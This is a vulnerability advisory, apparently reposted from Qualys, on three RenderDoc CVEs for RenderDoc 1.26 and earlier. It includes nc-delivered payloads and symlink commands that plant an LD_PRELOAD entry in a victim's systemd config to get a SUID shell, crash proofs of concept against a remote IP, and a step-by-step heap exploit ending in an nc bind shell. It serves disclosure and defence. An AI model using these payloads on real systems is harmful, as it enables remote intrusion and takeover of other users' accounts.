## https://sploitus.com/exploit?id=1337DAY-ID-38770
LPE and RCE in RenderDoc: CVE-2023-33865, CVE-2023-33864, CVE-2023-33863
========================================================================
Contents
========================================================================
Summary
CVE-2023-33865, a symlink vulnerability in /tmp/RenderDoc
- Analysis
- Exploitation
CVE-2023-33864, an integer underflow to heap-based buffer overflow
- Analysis
- Exploitation
CVE-2023-33863, an integer overflow to heap-based buffer overflow
- Analysis
Acknowledgments
========================================================================
Summary
========================================================================
"RenderDoc is a free MIT licensed stand-alone graphics debugger that
allows quick and easy single-frame capture and detailed introspection
of any application using Vulkan, D3D11, OpenGL & OpenGL ES or D3D12
across Windows, Linux, Android, or Nintendo Switch(TM)."
(https://renderdoc.org/)
To capture a frame on Linux, RenderDoc LD_PRELOADs the shared library
librenderdoc.so into the application to be debugged, and this library
immediately starts a server thread that listens on TCP port 38920 (on
all network interfaces) and waits for clients to connect. Unfortunately,
we discovered three vulnerabilities in this server's implementation:
- CVE-2023-33865, a symlink vulnerability that is exploitable by any
unprivileged local attacker to obtain the privileges of the user who
runs RenderDoc. The exact details of this symlink vulnerability made
it quite interesting and challenging to exploit.
- CVE-2023-33864, an integer underflow that results in a heap-based
buffer overflow that is exploitable by any remote attacker to execute
arbitrary code on the machine that runs RenderDoc. The unusual malloc
exploitation technique that we used to exploit this vulnerability is
reliable, one-shot, and works despite all the latest glibc, ASLR, PIE,
NX, and stack-canary protections.
- CVE-2023-33863, an integer overflow that results in a heap-based
buffer overflow and may be exploitable by a remote attacker to execute
arbitrary code on the machine that runs RenderDoc (but we have not
tried to exploit this vulnerability).
All three vulnerabilities were fixed on May 19, 2023 by the following
commits (i.e., RenderDoc <= v1.26 is vulnerable, but v1.27 is fixed):
https://github.com/baldurk/renderdoc/commit/601ed56111ce3803d8476d438ade1c92d6092856
https://github.com/baldurk/renderdoc/commit/e0464fea4f9a7f149c4ee1d84e5ac57839a4a862
https://github.com/baldurk/renderdoc/commit/1f72a09e3b4fd8ba45be4b0db4889444ef5179e2
https://github.com/baldurk/renderdoc/commit/203fc8382a79d53d2035613d9425d966b1d4958e
https://github.com/baldurk/renderdoc/commit/771aa8e769b72e6a36b31d6e2116db9952dcbe9b
Last-minute note: RenderDoc also listens on TCP port 39920, but only
allows connections from private IPs there (10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/16), and can be configured to further restrict this allow-
list; on the other hand, RenderDoc allows anyone to connect to TCP port
38920 (the port that we exploited), and cannot be configured to restrict
who can connect there.
========================================================================
CVE-2023-33865, a symlink vulnerability in /tmp/RenderDoc
========================================================================
------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------
As soon as librenderdoc.so is LD_PRELOADed into the application to be
debugged, its library_loaded() function:
- creates the directory /tmp/RenderDoc, or reuses it if it already
exists, even if it does not belong to the user who runs RenderDoc
(Alice, in this advisory);
- opens (and possibly creates) a log file of the form
/tmp/RenderDoc/RenderDoc_app_YYYY.MM.DD_hh.mm.ss.log, and writes to it
in append mode:
------------------------------------------------------------------------
507 open(filename.c_str(), O_APPEND | O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
------------------------------------------------------------------------
Consequently, a local attacker can create /tmp/RenderDoc before Alice
runs RenderDoc, and can populate this directory with numerous symlinks
(of the form /tmp/RenderDoc/RenderDoc_app_YYYY.MM.DD_hh.mm.ss.log) that
point to an arbitrary file in the filesystem; when Alice runs RenderDoc,
this file will be created (if it does not exist already) and written to,
with Alice's privileges.
The attacker can write arbitrary strings into this file (by sending
these strings to RenderDoc on TCP port 38920), but unfortunately for the
attacker, RenderDoc prepends each of these strings with a header that is
not controlled by the attacker (and if the attacker sends a string that
contains \n characters, then RenderDoc splits this string into multiple
lines and prepends each line with the uncontrolled header), and this
uncontrolled header makes it impossible for the attacker to achieve
privilege escalation via Alice's usual dotfiles (.profile, .bashrc,
.ssh/authorized_keys, etc).
In the following example, the attacker (the user "nobody") writes
arbitrary shell commands into Alice's .bashrc file, but the uncontrolled
header that is prepended by RenderDoc causes a syntax error and prevents
Alice's shell from executing the attacker's commands:
------------------------------------------------------------------------
nobody$ mkdir -m 0777 /tmp/RenderDoc
nobody$ cd /tmp/RenderDoc
nobody$ for ((i=0; i<600; i++)); do
ln -sf /home/alice/.bashrc "$(date -d "now + $i seconds" +'RenderDoc_app_%Y.%m.%d_%H.%M.%S.log')";
done
------------------------------------------------------------------------
alice$ LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
nobody$ s='$(id)'$';id;\nid\n#'
nobody$ printf '%08x\n' "$(printf '%s' "$s" | wc -c)"
0000000e
nobody$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x0e\x00\x00\x00%s\0\0\0\0%064x' "$s" 1 | nc -nv 127.0.0.1 38920
(UNKNOWN) [127.0.0.1] 38920 (?) open
------------------------------------------------------------------------
alice$ bash
bash: /home/alice/.bashrc: line 114: syntax error near unexpected token `('
bash: /home/alice/.bashrc: line 114: `RDOC 003906: [05:50:25] core.cpp( 499) - Log - RenderDoc v1.26 Linux 64-bit Release (4524cddca999d52aff790b626f92bb21ae9fe41f) capturing application'
alice$ cat /home/alice/.bashrc
...
RDOC 003906: [05:50:25] core.cpp( 499) - Log - RenderDoc v1.26 Linux 64-bit Release (4524cddca999d52aff790b626f92bb21ae9fe41f) capturing application
RDOC 003906: [05:50:25] settings.cpp( 460) - Log - Loading config from /home/alice/.renderdoc/renderdoc.conf
RDOC 003906: [05:50:25] posix_libentry.cpp( 73) - Log - Loading into /usr/bin/sleep
RDOC 003906: [05:50:25] gl_hooks.cpp( 280) - Log - Registering OpenGL hooks
RDOC 003906: [05:50:25] glx_hooks.cpp( 811) - Log - Registering GLX hooks
RDOC 003906: [05:50:25] egl_hooks.cpp(1073) - Log - Registering EGL hooks
RDOC 003906: [05:50:25] vk_layer.cpp( 99) - Log - Registering Vulkan hooks
RDOC 003906: [05:56:03] target_control.cpp( 489) - Log - Invalid/Unsupported handshake '$(id);id;
RDOC 003906: [05:56:03] target_control.cpp( 489) - Log - id
RDOC 003906: [05:56:03] target_control.cpp( 489) - Log - #' / 1
------------------------------------------------------------------------
------------------------------------------------------------------------
Exploitation
------------------------------------------------------------------------
We spent a long time on this uncontrolled-header problem, and eventually
found the following two-step solution:
1/ We transform RenderDoc's symlink vulnerability into an arbitrary
directory creation, by writing to the file .config/user-dirs.defaults in
Alice's home directory: we write SYSTEMD=.config/systemd into this file,
and the next time Alice logs in, xdg-user-dirs-update will automatically
create the directory .config/systemd in Alice's home directory.
But how did we solve the uncontrolled-header problem?
xdg-user-dirs-update calls fgets() to read lines of at most 512 bytes
from .config/user-dirs.defaults, so if we write a string longer than 512
bytes into this file, then one fgets() will return a line that ends in
the middle of our long string, and the next fgets() will return a line
that starts in the middle of our long string: i.e., a line that starts
with our own data, not with RenderDoc's uncontrolled header.
2/ We transform RenderDoc's symlink vulnerability into an arbitrary code
execution, by writing to the file .config/systemd/user.conf in Alice's
home directory (we already created the directory .config/systemd in 1/):
we write DefaultEnvironment=LD_PRELOAD=/var/tmp/shell.so into this file,
and the next time Alice logs in, systemd will execute our shared library
/var/tmp/shell.so with Alice's privileges.
But how did we solve the uncontrolled-header problem this time? systemd
calls read_line_full() to read lines from .config/systemd/user.conf, and
this function "Considers EOF, \n, \r and \0 end of line delimiters", so
we simply use \r as a line delimiter to avoid the uncontrolled-header
problem (indeed, RenderDoc only adds an uncontrolled header after \n,
not after \r).
------------------------------------------------------------------------
nobody$ mkdir -m 0777 /tmp/RenderDoc
nobody$ cd /tmp/RenderDoc
nobody$ for ((i=0; i<600; i++)); do
ln -sf /home/alice/.config/user-dirs.defaults "$(date -d "now + $i seconds" +'RenderDoc_app_%Y.%m.%d_%H.%M.%S.log')";
done
------------------------------------------------------------------------
alice$ LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
nobody$ s="$(printf '_% 512s SYSTEMD=.config/systemd\n#' ' ')"
nobody$ printf '%08x\n' "$(printf '%s' "$s" | wc -c)"
0000021b
nobody$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x1b\x02\x00\x00%s\0\0\0\0%064x' "$s" 1 | nc -nv 127.0.0.1 38920
(UNKNOWN) [127.0.0.1] 38920 (?) open
------------------------------------------------------------------------
The next time Alice logs in, the directory .config/systemd will be
created in Alice's home directory; then:
------------------------------------------------------------------------
nobody$ mkdir -m 0777 /tmp/RenderDoc
nobody$ cd /tmp/RenderDoc
nobody$ for ((i=0; i<600; i++)); do
ln -sf /home/alice/.config/systemd/user.conf "$(date -d "now + $i seconds" +'RenderDoc_app_%Y.%m.%d_%H.%M.%S.log')";
done
------------------------------------------------------------------------
alice$ LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
nobody$ s=$'_\r[Manager]\rDefaultEnvironment=LD_PRELOAD=/var/tmp/shell.so\r#'
nobody$ printf '%08x\n' "$(printf '%s' "$s" | wc -c)"
0000003d
nobody$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x3d\x00\x00\x00%s\0\0\0\0%064x' "$s" 1 | nc -nv 127.0.0.1 38920
(UNKNOWN) [127.0.0.1] 38920 (?) open
------------------------------------------------------------------------
The next time Alice logs in, our shared library /var/tmp/shell.so will
be executed with Alice's privileges and will create a SUID shell in
/var/tmp; then:
------------------------------------------------------------------------
nobody$ /var/tmp/shell -p
$ id
uid=65534(nobody) gid=65534(nogroup) euid=1000(alice) groups=65534(nogroup)
^^^^^^^^^^^^^^^^
------------------------------------------------------------------------
========================================================================
CVE-2023-33864, an integer underflow to heap-based buffer overflow
========================================================================
------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------
When a client connects to librenderdoc.so's server thread on TCP port
38920, it must first send a handshake packet that contains a string, its
"client name"; to read this string, the server:
- malloc()ates an intermediary buffer of 64KB (at line 97), and reads
the beginning of the client's handshake packet into this buffer:
------------------------------------------------------------------------
42 static const uint64_t initialBufferSize = 64 * 1024;
..
92 StreamReader::StreamReader(Network::Socket *sock, Ownership own)
93 {
94 m_Sock = sock;
95
96 m_BufferSize = initialBufferSize;
97 m_BufferBase = AllocAlignedBuffer(m_BufferSize);
98 m_BufferHead = m_BufferBase;
99
100 // for sockets we use m_InputSize to indicate how much data has been read into the buffer.
101 m_InputSize = 0;
------------------------------------------------------------------------
- reads len, the length of the client-name string, from this
intermediary buffer (at line 1313), and malloc()ates a string buffer
of len bytes (at line 1314):
------------------------------------------------------------------------
1307 void SerialiseValue(SDBasic type, size_t byteSize, rdcstr &el)
1308 {
1309 uint32_t len = 0;
1310
1311 if(IsReading())
1312 {
1313 m_Read->Read(len);
1314 el.resize((int)len);
1315 if(len > 0)
1316 m_Read->Read(&el[0], len);
------------------------------------------------------------------------
- reads the client name directly into this string buffer (at line 185)
if it is longer than 10MB (otherwise the server first reads the client
name into the intermediary buffer, and then memcpy()s it into the
string buffer):
------------------------------------------------------------------------
139 bool Read(void *data, uint64_t numBytes)
140 {
...
183 if(numBytes >= 10 * 1024 * 1024 && Available() + 128 < numBytes)
184 {
185 success = ReadLargeBuffer(data, numBytes);
------------------------------------------------------------------------
More precisely, ReadLargeBuffer() reads all but the last 128 bytes of
the client name directly into the string buffer (at line 304), and reads
the last 128 bytes into the intermediary buffer (at line 354) and then
memcpy()s them into the string buffer (at line 358):
------------------------------------------------------------------------
271 bool StreamReader::ReadLargeBuffer(void *buffer, uint64_t length)
272 {
...
275 byte *dest = (byte *)buffer;
...
297 uint64_t directReadLength = length - 128;
...
304 bool ret = ReadFromExternal(dest, directReadLength);
305
306 dest += directReadLength;
...
350 m_BufferHead = m_BufferBase + m_BufferSize;
...
354 bool ret = ReadFromExternal(m_BufferHead - 128, 128);
...
357 if(dest && ret)
358 memcpy(dest, m_BufferHead - 128, 128);
------------------------------------------------------------------------
Unfortunately, ReadFromExternal() mistakenly believes that m_InputSize
(the total number of bytes read) can never exceed m_BufferSize (the size
of the intermediary buffer), but in ReadLargeBuffer()'s case m_InputSize
becomes larger than 10MB and m_BufferSize is 64KB, so the calculation of
bufSize underflows (at line 408) and the size that is passed to recv()
is much larger than the size of the destination buffer (at line 411):
------------------------------------------------------------------------
366 bool StreamReader::ReadFromExternal(void *buffer, uint64_t length)
367 {
...
399 byte *readDest = (byte *)buffer;
400
401 success = m_Sock->RecvDataBlocking(readDest, (uint32_t)length);
402
403 if(success)
404 {
405 m_InputSize += length;
406 readDest += length;
407
408 uint32_t bufSize = uint32_t(m_BufferSize - m_InputSize);
...
411 success = m_Sock->RecvDataNonBlocking(readDest, bufSize);
------------------------------------------------------------------------
Consequently, a remote attacker can overflow either the string buffer
(at line 304) or the intermediary buffer (at line 354). In the following
section, we explain how we transformed the overflow of the intermediary
buffer into a reliable, one-shot remote code execution, despite all the
latest glibc, malloc, ASLR, PIE, NX, and stack-canary protections.
Proof of concept (string-buffer overflow):
------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x%04096x' 1 1 | nc -nv 192.168.56.126 38920
Ncat: 10489872 bytes sent, 0 bytes received in 0.12 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2638 recvfrom(5, "00000000000000000000000000000000"..., 4284547056, 0, NULL, NULL) = 4096
...
2638 recvfrom(5, "", 128, 0, NULL, NULL) = 0
...
2638 writev(2, [{iov_base="Fatal glibc error: malloc assert"..., iov_len=47}, {iov_base="__libc_malloc", iov_len=13}, {iov_base=": ", iov_len=2}, {iov_base="!victim || chunk_is_mmapped (mem"..., iov_len=98}, {iov_base="\n", iov_len=1}], 5) = 161
...
2638 --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2637, si_uid=1000} ---
2637 <... clock_nanosleep resumed> <unfinished ...>) = ?
2638 +++ killed by SIGABRT +++
2637 +++ killed by SIGABRT +++
------------------------------------------------------------------------
Proof of concept (intermediary-buffer overflow):
------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ (printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x' 1; sleep 3; printf '%0128x%04096x' 1 1) | nc -nv 192.168.56.126 38920
Ncat: 10490000 bytes sent, 0 bytes received in 3.11 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2696 recvfrom(5, 0x7f725a9ff010, 4284547056, 0, NULL, NULL) = -1 EAGAIN (Resource temporarily unavailable)
...
2696 recvfrom(5, "00000000000000000000000000000000"..., 128, 0, NULL, NULL) = 128
...
2696 recvfrom(5, "00000000000000000000000000000000"..., 4284546928, 0, NULL, NULL) = 4096
...
2696 writev(2, [{iov_base="malloc(): corrupted top size", iov_len=28}, {iov_base="\n", iov_len=1}], 2) = 29
...
2696 --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2695, si_uid=1000} ---
2695 <... clock_nanosleep resumed> <unfinished ...>) = ?
2696 +++ killed by SIGABRT +++
2695 +++ killed by SIGABRT +++
------------------------------------------------------------------------
------------------------------------------------------------------------
Exploitation
------------------------------------------------------------------------
1/ When librenderdoc.so's server thread is created, the glibc's malloc
allocates a new "heap" for this thread: 64MB of mmap()ed memory, whose
start address is aligned on a multiple of 64MB. Initially, this heap is
mmap()ed PROT_NONE, and is mprotect()ed read-write as needed by malloc:
0 64M
----V----------------------------------------V--------------|-------------
| server thread's heap | random gap | libraries
----|----------------------------------------|--------------|-------------
Note: the gap of unmapped memory between the heap and the libraries is
random (and smaller than 64MB), because the heap is aligned on 64MB but
the libraries are randomly aligned on 4KB (or sometimes 2MB) by ASLR.
2/ We (remote attackers) establish 7 successive connections to the
server on TCP port 38920: for each one of these connections, the server
creates a new thread (a "client thread"), allocates a new thread stack
(8MB+4KB of mmap()ed memory, for the stack and its guard page), and then
memory-leaks this stack (because the server does not call pthread_join()
when the client thread terminates abnormally, which prevents its stack
from being freed or reused for another client thread).
The goal of this step 2/ is simply to fill the random gap between the
heap and the libraries (with the help of a memory leak), to prevent any
future thread stack from being allocated into this gap. The reason for
doing this will become clear in step 7/.
3/ We connect to the server on TCP port 38920, send a handshake packet
that contains a 16MB client-name string (it must be longer than 10MB to
trigger CVE-2023-33864), and obtain the following layout for the
server's heap:
0 14M 16M 20M 28M 32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
|F|I|L|C| ....
--|-+-+-+-+---------------------------------------------------------------
- F are fixed chunks of memory (at the very beginning of the heap) that
were not allocated by us but whose sizes are known to us;
- I is the 64KB intermediary buffer mentioned in the previous section;
- L is a small chunk that was memory-leaked (or free()d but stored in an
otherwise unused tcache) and whose size is exactly controlled by us;
- C is a small chunk (a "callstack" from our handshake packet) whose
exact size and contents do not matter much.
4/ We overflow the intermediary buffer I (thanks to CVE-2023-33864),
overwrite L's malloc_chunk header with an unchanged size field, and
overwrite C's malloc_chunk header with arbitrary prev_size and size
fields.
5/ The server free()s the intermediary buffer I. This free() succeeds
despite our buffer overflow because we overwrote the malloc_chunk header
of I's next chunk (L) with an unchanged size; without L between I and C,
free()'s security checks would detect that we overwrote C's malloc_chunk
header with arbitrary sizes and would abort().
6/ The server free()s the small chunk C. Because we overwrote C's
malloc_chunk header with a size field whose IS_MMAPPED bit is set,
free() calls its internal function munmap_chunk():
------------------------------------------------------------------------
3018 static void
3019 munmap_chunk (mchunkptr p)
3020 {
3021 size_t pagesize = GLRO (dl_pagesize);
3022 INTERNAL_SIZE_T size = chunksize (p);
....
3026 uintptr_t mem = (uintptr_t) chunk2mem (p);
3027 uintptr_t block = (uintptr_t) p - prev_size (p);
3028 size_t total_size = prev_size (p) + size;
....
3034 if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
3035 || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
3036 malloc_printerr ("munmap_chunk(): invalid pointer");
....
3044 __munmap ((char *) block, total_size);
3045 }
------------------------------------------------------------------------
- we fully control prev_size and size (because p is a pointer to C's
malloc_chunk header, which we overwrote), so we can munmap() an
arbitrary block of memory (at line 3044), relative to p (i.e.,
relative to C, and without knowing the ASLR);
- we can easily satisfy the preconditions at lines 3034 and 3035,
because we fully control prev_size and size, and because we know the
sizes of F and I, and we precisely control the size of L.
We exploit this arbitrary munmap() to punch a hole of exactly 8MB+4KB
(the size of a thread stack and its guard page) in the middle of the
server's heap:
0 14M 16M 20M 28M 32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
|F|I|L|C| .... | punched hole |
--|-+-+-+-+----------------------------------+----------------+-----------
Note: we cannot reuse the technique that we developed to exploit
CVE-2005-1513 (in qmail) here, because of the random gap between the
server's heap and the libraries (and our exploit here must be one-shot);
for reference:
https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt
https://maxwelldulin.com/BlogPost/House-of-Muney-Heap-Exploitation
https://www.ambionics.io/blog/hacking-watchguard-firewalls
7/ We connect to the server on TCP port 38920; the server creates a new
client thread, and allocates a new stack for this thread, exactly into
the hole that we punched in the server's heap (since step 2/ such a
stack cannot be allocated anymore into the random gap between the
server's heap and the libraries):
0 14M 16M 20M 28M 32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
|F|I|L|C| .... | client stack |
--|-+-+-+-+----------------------------------+----------------+-----------
We then disconnect from the server; the client thread terminates cleanly
and the server pthread_join()s with it, thus making its stack available
for a future client thread.
8/ We establish a long-lived connection to the server, and send a 14MB
client-name string (but we do not trigger CVE-2023-33864 this time); the
server reads our client name into a malloc()ated string buffer that ends
in the middle of the unused client stack (i.e., this client name and the
client stack overlap in the server's heap):
0 14M 16M 20M 28M 32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
|F|I|L|C| .... | | client stack |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
|---------------------------|
client name
Note: although the client stack's guard page is initially mmap()ed
PROT_NONE, it is conveniently mprotect()ed read-write by the glibc's
malloc when extending the server's heap for our 14MB client name (in
grow_heap())!
The server then creates a new client thread for our long-lived
connection, and reuses the existing client stack for this thread, thus
overwriting the end of our client name with data from the client stack.
9/ We establish another connection to the server; however, because our
first connection is still alive, the server disconnects us, but first
gives us the name of the client that is already connected (i.e., the
server sends us back our 14MB client name, which was partly overwritten
by data from the client stack), thus information-leaking all sorts of
stack contents to us: heap addresses, library addresses, stack
addresses, the stack canary, etc.
10/ While our first connection to the server is still alive, we
establish another connection and start sending a 9MB string; the server
reads this string into a malloc()ated buffer that starts in the middle
of the client stack (immediately after the 14MB client name), thus
overwriting the client stack with data that we fully control (a ROP
chain):
0 14M 16M 20M 28M 32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
|F|I|L|C| .... | | client stack |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
|---------------------------|--->
client name ROP
As soon as the client thread returns to a saved instruction pointer
(RIP) from the overwritten part of the client stack, our ROP chain is
executed: first a "ROP sled" (a series of minimal "ret" gadgets, because
we do not know the exact distance between the start of our ROP chain and
the first overwritten saved RIP in the client stack), followed by a
simple execve() of "/bin/nc -lp1337 -e/bin/bash".
Note: we build our ROP chain with gadgets from librenderdoc.so only
(whose address was information-leaked to us in step 9/), to avoid any
dependence on the application being debugged or its shared libraries.
To summarize this reliable, one-shot technique that we used to exploit
the heap-based buffer overflow in librenderdoc.so's multi-threaded TCP
server:
- we overwrite the malloc_chunk header of a heap-based buffer (which
will be free()d) with an arbitrary size field whose IS_MMAPPED bit is
set, and therefore transform this buffer overflow into an arbitrary
munmap() call (thanks to free()'s munmap_chunk() function);
- with this arbitrary munmap() call, we punch a hole of exactly 8MB+4KB
(the size of a thread stack) in the middle of the server's heap;
- we arrange for a thread stack to be mmap()ed into this hole, and for a
string (which will later be sent to us by the server) to be
malloc()ated over the lower part of this thread stack;
- when this string is sent to us by the server, parts of it were
overwritten by data from the thread stack, thus information-leaking
all sorts of stack contents to us (heap addresses, library addresses,
stack addresses, the stack canary, etc);
- finally, we arrange for another string (which we fully control) to be
malloc()ated over the higher part of the thread stack, and therefore
overwrite a saved instruction pointer (in the thread stack) with a ROP
chain of gadgets from librenderdoc.so (whose address was previously
information-leaked to us) -- a classic "stack smashing" attack.
Note: further possibilities for munmap_chunk() exploitation are explored
in http://tukan.farm/2016/07/27/munmap-madness/.
========================================================================
CVE-2023-33863, an integer overflow to heap-based buffer overflow
========================================================================
------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------
If a client connects to librenderdoc.so's server on TCP port 38920 and
wants to send a long string of exactly 0xffffffff bytes (UINT32_MAX),
then the server casts this uint32_t len to a signed int (at line 1314),
and because resize()'s argument is a size_t (a 64-bit integer on amd64),
this 0xffffffff int is sign-extended to a 0xffffffffffffffff size_t
(SIZE_MAX) inside resize():
------------------------------------------------------------------------
1307 void SerialiseValue(SDBasic type, size_t byteSize, rdcstr &el)
1308 {
1309 uint32_t len = 0;
1310
1311 if(IsReading())
1312 {
1313 m_Read->Read(len);
1314 el.resize((int)len);
1315 if(len > 0)
1316 m_Read->Read(&el[0], len);
------------------------------------------------------------------------
resize() calls reserve() to malloc()ate a buffer for this long string
(at line 508), and reserve() adds 1 to the size of this string (for a
null-terminator) and therefore integer-overflows the SIZE_MAX size of
this string to 0 and malloc()ates a minimum-sized buffer (at line 437)
that is much too small for the client's long string:
------------------------------------------------------------------------
484 void resize(const size_t s)
485 {
...
508 reserve(s);
------------------------------------------------------------------------
411 void reserve(size_t s)
412 {
...
437 char *new_str = allocate(s + 1);
------------------------------------------------------------------------
As a result, the client can overflow this heap-based buffer with up to
UINT32_MAX bytes. Proof of concept:
------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ (printf '\2\0\0\0\0\0\0\0\1\0\0\0\xff\xff\xff\xff'; sleep 3; printf '%04096x' 1) | nc -nv 192.168.56.126 38920
Ncat: 4112 bytes sent, 0 bytes received in 3.00 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2848 recvfrom(5, "00000000000000000000000000000000"..., 4294967167, 0, NULL, NULL) = 4096
2848 recvfrom(5, "", 4294963071, 0, NULL, NULL) = 0
...
2848 writev(2, [{iov_base="malloc(): corrupted top size", iov_len=28}, {iov_base="\n", iov_len=1}], 2) = 29
...
2848 --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2847, si_uid=1000} ---
2847 <... clock_nanosleep resumed> <unfinished ...>) = ?
2848 +++ killed by SIGABRT +++
2847 +++ killed by SIGABRT +++
------------------------------------------------------------------------
Note: we have not tried to exploit this vulnerability.
========================================================================
Acknowledgments
========================================================================
We thank Baldur Karlsson, RenderDoc's creator and developer, for this
invaluable open-source tool and for fixing these bugs just a few hours
after we reported them. We also thank Mitre's CVE Assignment Team.